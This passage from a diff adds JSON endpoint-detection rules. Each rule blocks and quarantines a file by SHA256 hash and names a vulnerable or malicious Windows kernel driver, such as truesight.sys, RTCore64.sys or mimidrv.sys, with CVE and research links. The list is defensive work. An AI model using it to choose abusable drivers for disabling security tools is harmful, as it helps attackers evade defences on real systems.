+ "last_update": "2026-03-23T11:45:29.617782Z",
+ "creation_date": "2026-03-23T11:45:29.617784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8",
+ "comment": "Getac Technology vulnerable BIOS update tool (aka mtcBSv64.sys) [https://www.loldrivers.io/drivers/3bc629e8-7bf8-40c2-965b-87eb155e0065/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7777b725-f411-5be2-a4cc-0ecc91efcfe2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144334Z",
+ "creation_date": "2026-03-23T11:45:32.144337Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "289761eef2976b001879181b97324408e849729dbf41403fb73ee85565667012",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "778d68f5-f8fc-5f57-884b-750a324caebb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145570Z",
+ "creation_date": "2026-03-23T11:45:31.145572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145578Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3ec72b09bf08acde63cb70be268d3dc8024e475a09016be6ba84389613842f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "779ad2b7-43c4-59c1-9613-a69705cb4a6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605953Z",
+ "creation_date": "2026-03-23T11:45:29.605956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdbceca41e576841cad2f2b38ee6dbf92fd77fbbfdfe6ecf99f0623d44ef182c",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77ab0f68-a723-5bc1-88bd-a3d02660da9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150000Z",
+ "creation_date": "2026-03-23T11:45:31.150002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10aef6faf4aacd54afa01b6e5476be5c5c12bf65fb938150a23058646cf006ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77ac351a-d90f-5f9b-85e3-bb9ef210e769",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969452Z",
+ "creation_date": "2026-03-23T11:45:29.969454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cd8e9eb8e4754f07fdfc8c3aae4d7fc0d25b346884c3474db35c757d2994b34",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77af0422-e09d-5357-905f-a31d166784ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487613Z",
+ "creation_date": "2026-03-23T11:45:31.487615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "653ed33a842c6b966785d9cf3e1e794e28585305e989f70954ccf0e9f9126444",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77b2ede8-c6ef-595f-87a9-78cc356f5e7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829501Z",
+ "creation_date": "2026-03-23T11:45:30.829503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5b43b85c87271641e2ac41768851284a02b3eb578946a32c9b0e762f2c00dcc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77b45c06-d4fb-5167-b87b-420515322979",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490243Z",
+ "creation_date": "2026-03-23T11:45:31.490245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490251Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ddb9683ac78ea953dc06145752a8662f16485eeddbcca3e7f466d3d148d2d2ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77b5a870-8639-54ee-9d54-a7ff3674cb16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622508Z",
+ "creation_date": "2026-03-23T11:45:29.622510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "092349aebdac28294dbad1656759d8461f362d1a36b01054dccf861d97beadf0",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77b91e54-81ce-56d0-8587-ac1517abcbdb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469981Z",
+ "creation_date": "2026-03-23T11:45:30.469984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fba340eece424f30bdf80126f2d72eba5165bc174ccfb5e240b281639f675e3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77c6fba4-3cc2-532a-93f2-a3648acc9a78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810100Z",
+ "creation_date": "2026-03-23T11:45:31.810103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc02b24769fc1f663fd40d2d4733e22276d08856730422f5595d4418d656a80f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77d18535-fce9-5b08-b599-c1fee5dc51d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478258Z",
+ "creation_date": "2026-03-23T11:45:30.478261Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478270Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07e8a7f0fcc8be78167704c6679c70ea184961f5a5bd2066620a4b7eeb939885",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77dd89f9-ef8b-565c-b785-221113a73cec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607800Z",
+ "creation_date": "2026-03-23T11:45:29.607802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1867d13a4cab66a76f4d4448824ca0cb3a176064626f9618c0c103ee3cb4f47",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77fc4491-498b-520f-96ef-ced91cd7467b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815384Z",
+ "creation_date": "2026-03-23T11:45:31.815386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4dd128411779f4e1e0a9b15dfec68c671e9b6b4b429c06668b048b15d230ea0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "77fcec05-7565-50a9-adf3-2393067c03ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474474Z",
+ "creation_date": "2026-03-23T11:45:30.474477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "718e76d8cdcdf7b06342b5137f5591233aece4bf70fa9d761d38bd02993a0906",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7802e821-d9dc-5cdf-b254-4843786bf3c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835954Z",
+ "creation_date": "2026-03-23T11:45:30.835957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "563a68c814f5f720b44eb252d2b4d10c048ff8034d5d44c9796862b9487a4e48",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78110f68-ba90-5a8f-a4d4-bda3e7ac5e34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836487Z",
+ "creation_date": "2026-03-23T11:45:30.836489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "823d2d249504e080aa8ca2af09f3b147675f21ba1953a0164efe3d9e90b7b12b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7817cbc4-ea14-5326-8e1b-1211056888ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815898Z",
+ "creation_date": "2026-03-23T11:45:31.815900Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59a23a5ecb1d083892900e8590d97645cd01e6b6e1ae823144b833ff9311217f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "781863cd-dfa9-570a-88f3-6b80b7e5569d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144932Z",
+ "creation_date": "2026-03-23T11:45:31.144936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144942Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c490af54e5d4ae907873bcd1279907445b1f37413b4ec081a8b36bfb303db19d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78190055-60c9-50ab-b3ab-d02cbf0c3dc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827578Z",
+ "creation_date": "2026-03-23T11:45:30.827580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3cff3b8a356b80eda5fd748c23691dd711b2d6553ff373e43dd4025b40b0ad5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7824f082-58f7-5f3a-ad77-d557d2a4bc99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809544Z",
+ "creation_date": "2026-03-23T11:45:31.809547Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "771b9b964d2e3d7a6743d28371622c14d6dd695ac5cc6a1b16449415608f50a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "782a2e1c-0cc5-594a-bd9f-7e20daa50099",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144577Z",
+ "creation_date": "2026-03-23T11:45:32.144580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
